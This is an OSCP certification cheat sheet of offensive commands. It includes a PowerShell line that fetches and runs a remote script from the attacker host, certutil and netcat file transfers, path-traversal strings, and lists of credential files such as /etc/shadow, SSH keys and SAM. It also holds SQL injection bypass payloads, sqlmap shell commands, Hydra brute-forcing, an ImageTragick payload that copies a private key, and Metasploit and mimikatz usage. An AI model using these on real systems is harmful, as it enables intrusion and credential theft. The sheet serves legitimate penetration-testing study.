OSCP Cheat Sheet
Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.
Table of Contents
Basics
Information Gathering
Vulnerability Analysis
Web Application Analysis
Database Assessment
Password Attacks
Reverse Engineering
Exploitation Tools
Post Exploitation
CVEs
Exploiting
Payloads
Wordlists
Social Media Resources
Commands
Basics
CentOS
doas - u < USERNAME > /bin /sh
Certutil
certutil - urlcache - split - f "http://<LHOST>/<FILE>" < FILE >
Chisel
./chisel server - p 9002 - reverse - v
./chisel client < RHOST > :9002 R :9003 :127.0 .0.1 :8888
gcc
gcc (-- static ) - m32 - Wl ,-- hash - style = both exploit .c - o exploit
i686 - w64 - mingw32 - gcc - o main32 .exe main .c
x86_64 - w64 - mingw32 - gcc - o main64 .exe main .c
Netcat
nc - lnvp < LPORT > < < FILE >
nc < RHOST > < RPORT > > < FILE >
PHP Webserver
Ping
ping - c 1 < RHOST >
ping - n 1 < RHOST >
Python Webserver
sudo python - m SimpleHTTPServer 80
sudo python3 - m http .server 80
RDP
xfreerdp /v :< RHOST > /u :< USERNAME > /p :< PASSWORD > + clipboard
rdesktop < RHOST >
SSH
ssh user @< RHOST > - oKexAlgorithms = + diffie - hellman - group1 - sha1
ssh - R 8080 :< LHOST > :80 < RHOST >
ssh - L 8000 :127.0 .0.1 :8000 < USERNAME > @< RHOST >
ssh - N - L 1234 :127.0 .0.1 :1234 < USERNAME > @< RHOST >
ssh - L 80 :< LHOST > :80 < RHOST >
ssh - L 127.0 .0 .1 :80 :< LHOST > :80 < RHOST >
ssh - L 80 :localhost :80 < RHOST >
tmux
ctrl b + w # show windows
ctrl + " # split window horizontal
ctrl + % # split window vertical
ctrl + , # rename window
ctrl + { # flip window
ctrl + } # flip window
ctrl + spacebar # switch pane layout
Copy & Paste
:setw - g mode - keys vi
1. ctrl b + [
2. space
3. enter
4. ctrl b + ]
Search
ctrl b + [ # enter copy
ctrl + / # enter search while within copy mode for vi mode
n # search next
shift + n # reverse search
Upgrading Shells
python - c 'import pty ;pty .spawn ("/bin/bash" )'
python3 - c 'import pty ;pty .spawn ("/bin/bash" )'
ctrl + z
stty raw - echo
fg
Enter
Enter
export XTERM = xterm
vi
:w !sudo tee % # save file with elevated privileges without exiting
Windows Command Formatting
echo "< COMMAND > " | iconv -f UTF-8 -t UTF-16LE | base64 -w0
Information Gathering
Nmap
sudo nmap - A - T4 - p - - sS - sV - oN initial -- script discovery < RHOST > # discovery scan
sudo nmap - A - T4 - sC - sV -- script vuln < RHOST > # vulnerability scan
sudo nmap - sU < RHOST > # udp scan
sudo nmap - sC - sV - p - -- scan - delay 5 s < RHOST > # delayed scan
sudo nmap $TARGET - p 88 -- script krb5 - enum - users -- script - args krb5 - enum - users .realm = 'test ' < RHOST > # kerberos enumeration
ls - lh /usr /share /nmap /scripts /* ssh *
locate - r '\.nse $' | xargs grep categories | grep categories | grep 'default \|version \|safe ' | grep smb
DNS
Reverse DNS
whois < RHOST >
host < RHOST > < RHOST >
host - l < RHOST > < RHOST >
dig @< RHOST > - x < RHOST >
dig {a |txt |ns |mx } < RHOST >
dig {a |txt |ns |mx } < RHOST > @ns1 .< RHOST >
dig axfr @< RHOST > < RHOST > # zone transfer
ldapsearch
ldapsearch - x - w < PASSWORD >
ldapsearch - x - h < RHOST > - s base namingcontexts
ldapsearch - x - b "dc=<RHOST>,dc=local" "*" - h < RHOST > | awk '/dn : / {print $2 }'
ldapsearch - x - D "cn=admin,dc=<RHOST>,dc=local" - s sub "cn=*" - h < RHOST > | awk '/uid : /{print $2 }' | nl
ldapsearch - D "cn=admin,dc=acme,dc=com" "(objectClass=*)" - w ldapadmin - h ldap .acme .com
ldapsearch - x - h < RHOST > - D "< USERNAME > " -b " dc = < RHOST > ,dc = local " "(ms-MCS-AdmPwd=*)" ms - MCS - AdmPwd
sslyze
sslyze -- heartbleed < RHOST >
SMB / NetBIOS
nbtscan < RHOST >
enum4linux - a < RHOST >
JAWS
IEX (New - Object Net .webclient ).downloadString ('http ://<LHOST>:<LPORT>/jaws-enum.ps1')
Vulnerability Analysis
finger
./finger - user - enum .pl - U /usr /share /seclists /Usernames /Names /names .txt - t < RHOST >
Web Application Analysis
Asset Discovery
curl - s - k "https://jldc.me/anubis/subdomains/example.com" | grep - Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d '
ffuf
ffuf - w /usr /share /wordlists /dirb /common .txt - u http ://<RHOST>/FUZZ -mc 200,204,301,302,307,401 -o results.txt
ffuf - c - w /usr /share /seclists /Discovery /DNS /subdomains - top1million - 110000. txt - u http ://<RHOST>/ -H "Host: FUZZ.<RHOST>" -fs 185
ffuf - c - w /usr /share /wordlists /seclists /Fuzzing /4 - digits - 0000 - 9999. txt - u http ://<RHOST>/backups/backup_2020070416FUZZ.zip
API Fuzzing
ffuf - u https ://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412
Looging for LFI
ffuf - w /usr /share /wordlists /seclists /Fuzzing /LFI /LFI - Jhaddix .txt - u http ://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349
Fuzzing with PHP Session ID
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - lowercase - 2.3 - small .txt - u "http://<RHOST>/admin/FUZZ.php" - b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" - fw 2644
Recursion
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - 2.3 - small .txt - u http ://<RHOST>/cd/basic/FUZZ -recursion
File Extensions
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - 2.3 - small .txt - u http ://<RHOST>/cd/ext/logs/FUZZ -e .log
No 404 Header
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - 2.3 - small .txt - u http ://<RHOST>/cd/no404/FUZZ -fs 669
Param Mining
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - 2.3 - small .txt - u http ://<RHOST>/cd/param/data?FUZZ=1
Rate Limiting
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - 2.3 - small .txt - t 5 - p 0.1 - u http ://<RHOST>/cd/rate/FUZZ -mc 200,429
IDOR Testing
seq 1 1000 | ffuf - w - - u http ://<RHOST>/cd/pipes/user?id=FUZZ
Script for IDOR Testing
#!/bin /bash
while read i
do
if [ "$1" == "md5" ]; then
echo - n $i | md5sum | awk '{ print $1 }'
elif [ "$1" == "b64" ]; then
echo - n $i | base64
else
echo $i
fi
done
Use Script above for Base64 decoding
seq 1 1000 | /usr /local /bin /hashit b64 | ffuf - w - - u http ://<RHOST>/cd/pipes/user2?id=FUZZ
MD5 Discovery using the Script
seq 1 1000 | /usr /local /bin /hashit md5 | ffuf - w - - u http ://<RHOST>/cd/pipes/user3?id=FUZZ
Virtual Host Discovery
ffuf - w /usr /share /wordlists /seclists /Discovery /DNS /subdomains - top1million - 5000. txt - H "Host: FUZZ.<RHOST>" - u http ://<RHOST> -fs 1495
Massive File Extension Discovery
ffuf - w /opt /seclists /Discovery /Web - Content /directory - list - 1.0 .txt - u http ://<RHOST>/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip
Gobuster
- e // extended mode that renders the full url
- k // skip ssl certificate validation
- r // follow cedirects
- s // status codes
- b // exclude status codes
- k // ignore certificates
-- wildcard // set wildcard option
$ gobuster dir - w /usr /share /wordlists /dirbuster /directory - list - 2.3 - medium .txt - u http ://<RHOST>/
$ gobuster dir - w /usr /share /seclists /Discovery /Web - Content /big .txt - u http ://<RHOST>/ -x php
$ gobuster dir - w /usr /share /wordlists /dirb /big .txt - u http ://<RHOST>/ -x php,txt,html,js -e -s 200
$ gobuster dir - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - lowercase - 2.3 - medium .txt - u https ://<RHOST>:<RPORT>/ -b 200 -k --wildcard
Common File Extensions
txt ,bak ,php ,html ,js ,asp ,aspx
Common Picture Extensions
POST Requests
gobuster dir - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - lowercase - 2.3 - medium .txt - u http ://<RHOST>/api/ -e -s 200
DNS Recon
gobuster dns - d < RHOST > - t 50 - w /usr /share /wordlists /seclists /Discovery /DNS /subdomains - top1million - 110000. txt
VHost Discovery
gobuster vhost - u < RHOST > - t 50 - w /usr /share /wordlists /seclists /Discovery /DNS /subdomains - top1million - 110000. txt
Specifiy User Agent
gobuster dir - w /usr /share /wordlists /dirbuster /directory - list - 2.3 - medium .txt - u http ://<RHOST>/ -a Linux
Local File Inclusion (LFI)
http ://<RHOST>/<FILE>.php?file=
http ://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http ://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd
Until php 5.3
http ://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd%00
Encoded Traversal Strings
../
..\
..\/
%2e %2e %2f
%252e %252e %252f
%c0 %ae %c0 %ae %c0 %af
%uff0e %uff0e %u2215
%uff0e %uff0e %u2216
..././
...\.\
Base64 Execution Bypass
http ://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
base64 - d < FILE > .php
Linux Files
/etc /passwd
/etc /shadow
/etc /aliases
/etc /anacrontab
/etc /apache2 /apache2 .conf
/etc /apache2 /httpd .conf
/etc /apache2 /sites - enabled /000 - default .conf
/etc /at .allow
/etc /at .deny
/etc /bashrc
/etc /bootptab
/etc /chrootUsers
/etc /chttp .conf
/etc /cron .allow
/etc /cron .deny
/etc /crontab
/etc /cups /cupsd .conf
/etc /exports
/etc /fstab
/etc /ftpaccess
/etc /ftpchroot
/etc /ftphosts
/etc /groups
/etc /grub .conf
/etc /hosts
/etc /hosts .allow
/etc /hosts .deny
/etc /httpd /access .conf
/etc /httpd /conf /httpd .conf
/etc /httpd /httpd .conf
/etc /httpd /logs /access_log
/etc /httpd /logs /access .log
/etc /httpd /logs /error_log
/etc /httpd /logs /error .log
/etc /httpd /php .ini
/etc /httpd /srm .conf
/etc /inetd .conf
/etc /inittab
/etc /issue
/etc /lighttpd .conf
/etc /lilo .conf
/etc /logrotate .d /ftp
/etc /logrotate .d /proftpd
/etc /logrotate .d /vsftpd .log
/etc /lsb - release
/etc /motd
/etc /modules .conf
/etc /motd
/etc /mtab
/etc /my .cnf
/etc /my .conf
/etc /mysql /my .cnf
/etc /network /interfaces
/etc /networks
/etc /npasswd
/etc /passwd
/etc /php4 .4 /fcgi /php .ini
/etc /php4 /apache2 /php .ini
/etc /php4 /apache /php .ini
/etc /php4 /cgi /php .ini
/etc /php4 /apache2 /php .ini
/etc /php5 /apache2 /php .ini
/etc /php5 /apache /php .ini
/etc /php /apache2 /php .ini
/etc /php /apache /php .ini
/etc /php /cgi /php .ini
/etc /php .ini
/etc /php /php4 /php .ini
/etc /php /php .ini
/etc /printcap
/etc /profile
/etc /proftp .conf
/etc /proftpd /proftpd .conf
/etc /pure - ftpd .conf
/etc /pureftpd .passwd
/etc /pureftpd .pdb
/etc /pure - ftpd /pure - ftpd .conf
/etc /pure - ftpd /pure - ftpd .pdb
/etc /pure - ftpd /putreftpd .pdb
/etc /redhat - release
/etc /resolv .conf
/etc /samba /smb .conf
/etc /snmpd .conf
/etc /ssh /ssh_config
/etc /ssh /sshd_config
/etc /ssh /ssh_host_dsa_key
/etc /ssh /ssh_host_dsa_key .pub
/etc /ssh /ssh_host_key
/etc /ssh /ssh_host_key .pub
/etc /sysconfig /network
/etc /syslog .conf
/etc /termcap
/etc /vhcs2 /proftpd /proftpd .conf
/etc /vsftpd .chroot_list
/etc /vsftpd .conf
/etc /vsftpd /vsftpd .conf
/etc /wu - ftpd /ftpaccess
/etc /wu - ftpd /ftphosts
/etc /wu - ftpd /ftpusers
/logs /pure - ftpd .log
/logs /security_debug_log
/logs /security_log
/opt /lampp /etc /httpd .conf
/opt /xampp /etc /php .ini
/proc /cpuinfo
/proc /filesystems
/proc /interrupts
/proc /ioports
/proc /meminfo
/proc /modules
/proc /mounts
/proc /< PID > /cmdline
/proc /< PID > /maps
/proc /stat
/proc /swaps
/proc /version
/proc /self /net /arp
/proc /self /cwd /app .py
/proc /sched_debug
/proc /net /arp
/proc /net /tcp
/proc /net /udp
/root /anaconda - ks .cfg
/usr /etc /pure - ftpd .conf
/usr /lib /php .ini
/usr /lib /php /php .ini
/usr /local /apache /conf /modsec .conf
/usr /local /apache /conf /php .ini
/usr /local /apache /log
/usr /local /apache /logs
/usr /local /apache /logs /access_log
/usr /local /apache /logs /access .log
/usr /local /apache /audit_log
/usr /local /apache /error_log
/usr /local /apache /error .log
/usr /local /cpanel /logs
/usr /local /cpanel /logs /access_log
/usr /local /cpanel /logs /error_log
/usr /local /cpanel /logs /license_log
/usr /local /cpanel /logs /login_log
/usr /local /cpanel /logs /stats_log
/usr /local /etc /httpd /logs /access_log
/usr /local /etc /httpd /logs /error_log
/usr /local /etc /php .ini
/usr /local /etc /pure - ftpd .conf
/usr /local /etc /pureftpd .pdb
/usr /local /lib /php .ini
/usr /local /php4 /httpd .conf
/usr /local /php4 /httpd .conf .php
/usr /local /php4 /lib /php .ini
/usr /local /php5 /httpd .conf
/usr /local /php5 /httpd .conf .php
/usr /local /php5 /lib /php .ini
/usr /local /php /httpd .conf
/usr /local /php /httpd .conf .ini
/usr /local /php /lib /php .ini
/usr /local /pureftpd /etc /pure - ftpd .conf
/usr /local /pureftpd /etc /pureftpd .pdn
/usr /local /pureftpd /sbin /pure - config .pl
/usr /local /www /logs /httpd_log
/usr /local /Zend /etc /php .ini
/usr /sbin /pure - config .pl
/var /adm /log /xferlog
/var /apache2 /config .inc
/var /apache /logs /access_log
/var /apache /logs /error_log
/var /cpanel /cpanel .config
/var /lib /mysql /my .cnf
/var /lib /mysql /mysql /user .MYD
/var /local /www /conf /php .ini
/var /log /apache2 /access_log
/var /log /apache2 /access .log
/var /log /apache2 /error_log
/var /log /apache2 /error .log
/var /log /apache /access_log
/var /log /apache /access .log
/var /log /apache /error_log
/var /log /apache /error .log
/var /log /apache - ssl /access .log
/var /log /apache - ssl /error .log
/var /log /auth .log
/var /log /boot
/var /htmp
/var /log /chttp .log
/var /log /cups /error .log
/var /log /daemon .log
/var /log /debug
/var /log /dmesg
/var /log /dpkg .log
/var /log /exim_mainlog
/var /log /exim /mainlog
/var /log /exim_paniclog
/var /log /exim .paniclog
/var /log /exim_rejectlog
/var /log /exim /rejectlog
/var /log /faillog
/var /log /ftplog
/var /log /ftp - proxy
/var /log /ftp - proxy /ftp - proxy .log
/var /log /httpd - access .log
/var /log /httpd /access_log
/var /log /httpd /access .log
/var /log /httpd /error_log
/var /log /httpd /error .log
/var /log /httpsd /ssl .access_log
/var /log /httpsd /ssl_log
/var /log /kern .log
/var /log /lastlog
/var /log /lighttpd /access .log
/var /log /lighttpd /error .log
/var /log /lighttpd /lighttpd .access .log
/var /log /lighttpd /lighttpd .error .log
/var /log /mail .info
/var /log /mail .log
/var /log /maillog
/var /log /mail .warn
/var /log /message
/var /log /messages
/var /log /mysqlderror .log
/var /log /mysql .log
/var /log /mysql /mysql - bin .log
/var /log /mysql /mysql .log
/var /log /mysql /mysql - slow .log
/var /log /proftpd
/var /log /pureftpd .log
/var /log /pure - ftpd /pure - ftpd .log
/var /log /secure
/var /log /vsftpd .log
/var /log /wtmp
/var /log /xferlog
/var /log /yum .log
/var /mysql .log
/var /run /utmp
/var /spool /cron /crontabs /root
/var /webmin /miniserv .log
/var /www /< vhost > /__init__ .py
/var /www /log /access_log
/var /www /log /error_log
/var /www /logs /access_log
/var /www /logs /error_log
/var /www /logs /access .log
/var /www /logs /error .log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh /authorized_keys
~/.ssh /id_dsa
~/.ssh /id_dsa .pub
~/.ssh /id_rsa
~/.ssh /id_rsa .pub
~/.ssh /identity
~/.ssh /identity .pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
Windows Files
C :/Users /Administrator /NTUser .dat
C :/Documents and Settings /Administrator /NTUser .dat
C :/apache /logs /access .log
C :/apache /logs /error .log
C :/apache /php /php .ini
C :/boot .ini
C :/inetpub /wwwroot /global .asa
C :/MySQL /data /hostname .err
C :/MySQL /data /mysql .err
C :/MySQL /data /mysql .log
C :/MySQL /my .cnf
C :/MySQL /my .ini
C :/php4 /php .ini
C :/php5 /php .ini
C :/php /php .ini
C :/Program Files /Apache Group /Apache2 /conf /httpd .conf
C :/Program Files /Apache Group /Apache /conf /httpd .conf
C :/Program Files /Apache Group /Apache /logs /access .log
C :/Program Files /Apache Group /Apache /logs /error .log
C :/Program Files /FileZilla Server /FileZilla Server .xml
C :/Program Files /MySQL /data /hostname .err
C :/Program Files /MySQL /data /mysql - bin .log
C :/Program Files /MySQL /data /mysql .err
C :/Program Files /MySQL /data /mysql .log
C :/Program Files /MySQL /my .ini
C :/Program Files /MySQL /my .cnf
C :/Program Files /MySQL /MySQL Server 5.0 /data /hostname .err
C :/Program Files /MySQL /MySQL Server 5.0 /data /mysql - bin .log
C :/Program Files /MySQL /MySQL Server 5.0 /data /mysql .err
C :/Program Files /MySQL /MySQL Server 5.0 /data /mysql .log
C :/Program Files /MySQL /MySQL Server 5.0 /my .cnf
C :/Program Files /MySQL /MySQL Server 5.0 /my .ini
C :/Program Files (x86 )/Apache Group /Apache2 /conf /httpd .conf
C :/Program Files (x86 )/Apache Group /Apache /conf /httpd .conf
C :/Program Files (x86 )/Apache Group /Apache /conf /access .log
C :/Program Files (x86 )/Apache Group /Apache /conf /error .log
C :/Program Files (x86 )/FileZilla Server /FileZilla Server .xml
C :/Program Files (x86 )/xampp /apache /conf /httpd .conf
C :/WINDOWS /php .ini
C :/WINDOWS /Repair /SAM
C :/Windows /repair /system
C :/Windows /repair /software
C :/Windows /repair /security
C :/WINDOWS /System32 /drivers /etc /hosts
C :/Windows /win .ini
C :/WINNT /php .ini
C :/WINNT /win .ini
C :/xampp /apache /bin /php .ini
C :/xampp /apache /logs /access .log
C :/xampp /apache /logs /error .log
C :/Windows /Panther /Unattend /Unattended .xml
C :/Windows /Panther /Unattended .xml
C :/Windows /debug /NetSetup .log
C :/Windows /system32 /config /AppEvent .Evt
C :/Windows /system32 /config /SecEvent .Evt
C :/Windows /system32 /config /default .sav
C :/Windows /system32 /config /security .sav
C :/Windows /system32 /config /software .sav
C :/Windows /system32 /config /system .sav
C :/Windows /system32 /config /regback /default
C :/Windows /system32 /config /regback /sam
C :/Windows /system32 /config /regback /security
C :/Windows /system32 /config /regback /system
C :/Windows /system32 /config /regback /software
C :/Program Files /MySQL /MySQL Server 5.1 /my .ini
C :/Windows /System32 /inetsrv /config /schema /ASPNET_schema .xml
C :/Windows /System32 /inetsrv /config /applicationHost .config
C :/inetpub /logs /LogFiles /W3SVC1 /u_ex [YYMMDD ].log
wfuzz
wfuzz - w /usr /share /wfuzz /wordlist /general /big .txt - u http ://<RHOST>/FUZZ/<FILE>.php --hc '403,404'
Write to File
wfuzz - w /PATH /TO /WORDLIST - c - f < FILE > - u http ://<RHOST> --hc 403,404
Custom Scan with limited Output
wfuzz - w /PATH /TO /WORDLIST - u http ://<RHOST>/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20
Fuzzing two Parameters at once
wfuzz - w /usr /share /wordlists /seclists /Discovery /Web - Content /big .txt - u http ://<RHOST>:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c
Domain
wfuzz -- hh 0 - w /usr /share /seclists /Discovery /DNS /subdomains - top1million - 5000. txt - H 'Host : FUZZ .< RHOST > .< tld > ' - u http ://<RHOST>/
Subdomain
wfuzz - w /usr /share /wordlists /seclists /Discovery /DNS /subdomains - top1million - 110000. txt - H "Host: FUZZ.<RHOST>" -- hc 200 -- hw 356 - t 100 < RHOST >
Git
wfuzz - w /usr /share /wordlists /seclists /Discovery /Web - Content /raft - medium - files - lowercase .txt - u http ://<RHOST>/FUZZ --hc 403,404
Login
wfuzz - X POST - u "http://<RHOST>:<RPORT>/login.php" - d "email=FUZZ&password=<PASSWORD>" - w /PATH /TO /WORDLIST /< WORDLIST > .txt -- hc 200 - c
wfuzz - X POST - u "http://<RHOST>:<RPORT>/login.php" - d "username=FUZZ&password=<PASSWORD>" - w /PATH /TO /WORDLIST /< WORDLIST > .txt -- ss "Invalid login"
SQL
wfuzz - c - z file ,/usr /share /wordlists /seclists /Fuzzing /SQLi /Generic - SQLi .txt - d 'db = FUZZ ' -- hl 16 http ://<RHOST>/select http
DNS
wfuzz - w /usr /share /seclists /Discovery /DNS /subdomains - top1million - 110000. txt - H "Origin: http://FUZZ.<RHOST>" -- filter "r.headers.response~'Access-Control-Allow-Origin'" http ://<RHOST>/
wfuzz - c - w /usr /share /wordlists /secLists /Discovery /DNS /subdomains - top1million - 110000. txt -- hc 400 ,404 ,403 - H "Host: FUZZ.<RHOST>" - u http ://<RHOST> -t 100
wfuzz - c - w /usr /share /wordlists /secLists /Discovery /DNS /subdomains - top1million - 110000. txt -- hc 400 ,403 ,404 - H "Host: FUZZ.<RHOST>" - u http ://<RHOST> --hw <value> -t 100
Numbering Files
wfuzz - w /usr /share /wordlists /seclists /Fuzzing /4 - digits - 0000 - 9999. txt -- hw 31 http ://10.13.37.11/backups/backup_2021052315FUZZ.zip
Enumerating PIDs
wfuzz - u 'http ://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000
WPScan
wpscan -- url https ://<RHOST> --disable-tls-checks
wpscan -- url https ://<RHOST> --disable-tls-checks --enumerate u
target = < RHOST > ; wpscan -- url http ://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
wpscan -- url http ://<RHOST> -U <USERNAME> -P passwords.txt -t 50
Database Analysis
Basic Commands
show databases ;
use < DATABASE > ;
show tables ;
SELECT * FROM * ;
mysql - u < USERNAME > - h < RHOST > - p
SQL Injection
Master List
admin ' or '1' = '1
' or '1' = '1
" or " 1 "=" 1
" or " 1 "=" 1 "--
" or "1" = "1" /*
" or " 1 "=" 1 "#
" or 1 = 1
" or 1=1 --
" or 1 = 1 -
" or 1=1--
" or 1 = 1 /*
" or 1=1#
" or 1 = 1 -
") or " 1 "=" 1
") or " 1 "=" 1 "--
" ) or "1" = "1" /*
") or " 1 "=" 1 "#
" ) or ("1" = "1
" ) or ("1" = "1" --
") or (" 1 "=" 1 "/*
" ) or ("1" = "1" #
) or '1`= '1-
Authentication Bypass
'-'
' '
'&'
'^'
'*'
' or 1 = 1 limit 1 -- - +
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-|| 0 '
"-||0"
"-"
" "
"&"
"^"
"*"
'-- '
"-- "
'-- ' / "--"
" or " "-"
" or " " "
" or " "&"
" or " "^"
" or " "*"
or true--
" or true--
' or true --
") or true--
') or true--
' or 'x' = 'x
' ) or ('x' )= ('x
' )) or (('x' ))= (('x
" or " x "=" x
") or (" x ")=(" x
")) or ((" x "))=((" x
or 2 like 2
or 1 = 1
or 1 = 1 --
or 1 = 1 #
or 1 = 1 /*
admin ' --
admin ' -- -
admin ' #
admin '/*
admin ' or '2' LIKE '1
admin ' or 2 LIKE 2 --
admin ' or 2 LIKE 2 #
admin ') or 2 LIKE 2 #
admin ') or 2 LIKE 2 --
admin ') or ('2' LIKE '2
admin ' ) or ('2' LIKE '2' #
admin ') or ('2' LIKE '2' /*
admin ' or '1' = '1
admin ' or '1' = '1' --
admin ' or ' 1 '=' 1 '#
admin ' or '1' = '1' /*
admin 'or 1 = 1 or ''='
admin ' or 1 = 1
admin ' or 1 = 1 --
admin ' or 1 = 1 #
admin ' or 1 = 1 /*
admin ') or ('1' = '1
admin ' ) or ('1' = '1' --
admin ') or ('1' = '1' #
admin ') or ('1' = '1' /*
admin ') or '1 '= '1
admin ' ) or '1 '= '1 '--
admin ') or '1 '= '1 '#
admin ') or '1 '= '1 '/*
1234 ' AND 1 = 0 UNION ALL SELECT 'admin ', ' 81 dc9bdb52d04dc20036dbd8313ed055
admin " --
admin ';-- azer
admin " #
admin " /*
admin " or " 1 "=" 1
admin " or " 1 "=" 1 "--
admin " or "1" = "1" #
admin " or " 1 "=" 1 "/*
admin "or 1 = 1 or "" = "
admin " or 1 = 1
admin " or 1=1--
admin " or 1 = 1 #
admin " or 1=1/*
admin " ) or ("1 "= "1
admin ") or ("1" = "1" --
admin ") or ("1" = "1" #
admin ") or (" 1 "=" 1 "/*
admin " ) or "1 "= "1
admin ") or "1 "= "1 "--
admin ") or "1 "= "1 "#
admin ") or "1 "= "1 "/*
1234 " AND 1=0 UNION ALL SELECT " admin ", " 81 dc9bdb52d04dc20036dbd8313ed055
sqlmap
-- batch # don 't ask any questions
-- current - db # dumps database
sqlmap -- list - tampers
sqlmap - r < FILE > .reg - p id
sqlmap - r < FILE > .reg - p id -- dump
sqlmap - r < FILE > .reg -- level 5 -- risk 3 -- threads 10
sqlmap - r < FILE > .reg -- level 5 -- risk 3 -- tables
sqlmap - r < FILE > .reg -- level 5 -- risk 3 -- tables users -- dump -- threads 10
sqlmap - r < FILE > .reg - p id -- passwords
sqlmap - r < FILE > .reg - p id -- read - file + /etc /passwd
sqlmap - R < FILE > .reg - p id -- os - cmd = whoami
sqlmap - u 'http ://<RHOST>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq"
sqlmap - u 'http ://<RHOST>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq" --os-shell
sqsh
sqsh - S < RHOST > - U < USERNAME >
SQL Truncation Attack
'admin @< FQDN > ' = ' admin @< FQDN > ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ htb '
xpath Injection
test ' or 1 = 1 or 'a' = 'a
test ' or 1 = 2 or 'a' = 'a
' or substring (Password ,1 ,1 )= 'p' or ' # checking letter "p" on the beginning of the password
'or substring (Password ,2 ,1 )= 'p' or ' # checking letter "p" on the second position of the password
Password Attacks
fcrack
fcrackzip - u - D - p /usr /share /wordlists /rockyou .txt < FILE > .zip
LaZagne
Hydra
export HYDRA_PROXY = connect ://127.0.0.1:8080
unset HYDRA_PROXY
hydra < RHOST > http - form - post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" - l root @localhost - P otrs - cewl .txt - vV - f
hydra - l admin - P /usr /share /wordlists /rockyou .txt < RHOST > http - post - form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"
John
/usr /share /john /ssh2john .py id_rsa > hash
john hash -- wordlist = /usr /share /wordlists /rockyou .txt < FILE >
john -- rules -- wordlist = /usr /share /wordlists /rockyou .txt < FILE >
john -- show < FILE >
Exploitation Tools
ImageTragick Polyglot Attack
poc .svg
< image authenticate = 'ff " `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;" '>
< read filename = "pdf:/etc/passwd" />
< get width = "base-width" height = "base-height" />
< resize geometry = "400x400" />
< write filename = "test.png" />
< svg width = "700" height = "700" xmlns = "http://www.w3.org/2000/svg" xmlns :xlink = "http://www.w3.org/1999/xlink" >
< image xlink :href = "msl:poc.svg" height = "100" width = "100" />
< /svg >
< /image >
$ convert poc .svg poc .png
Metasploit
General Usage
sudo msfdb init // database initialization
msf6 > search // search within metasploit
msf6 > set RHOST < RHOST > // set remote host
msf6 > set RPORT < RPORT > // set remote port
msf6 > run // run exploit
msf6 > spool /PATH /TO /FILE // recording screen output
msf6 > save // saves current state
msf6 > exploit // using module exploit
msf6 > payload // using module payload
msf6 > auxiliary // using module auxiliary
msf6 > encoder // using module encoder
msf6 > nop // using module nop
msf6 > show sessions // displays all current sessions
msf6 > sessions - i 1 // switch to session 1
msf6 > db_nmap - sC < RHOST > // using nmap
msf6 > jobs // showing all current jobs
msf6 > hosts // displaying hosts
msf6 > services // displaying services
msf6 > vulns // displaying vulnerabilities
msf6 > show payloads // displaying available payloads
msf6 > set VERBOSE true // enable verbose output
msf6 > set forceexploit true // exploits the target anyways
msf6 > use post /multi /manage /shell_to_meterpreter // shell to meterpreter
msf6 > use exploit /windows /http /oracle_event_processing_upload // use a specific module
C :\> > Ctrl + z // put active meterpreter shell in background
meterpreter > background // put meterpreter in background (same as "bg")
meterpreter > shell // get a system shell
meterpreter > channel - i < ID > // get back to existing meterpreter shell
meterpreter > ps // checking processes
meterpreter > migrate 2236 // migrate to a process
meterpreter > getuid // get the user id
meterpreter > sysinfo // get system information
meterpreter > upload // uploading local files to the target
meterpreter > ipconfig // get network configuration
meterpreter > load kiwi // load mimikatz
meterpreter > getprivs // get privileges after loading mimikatz
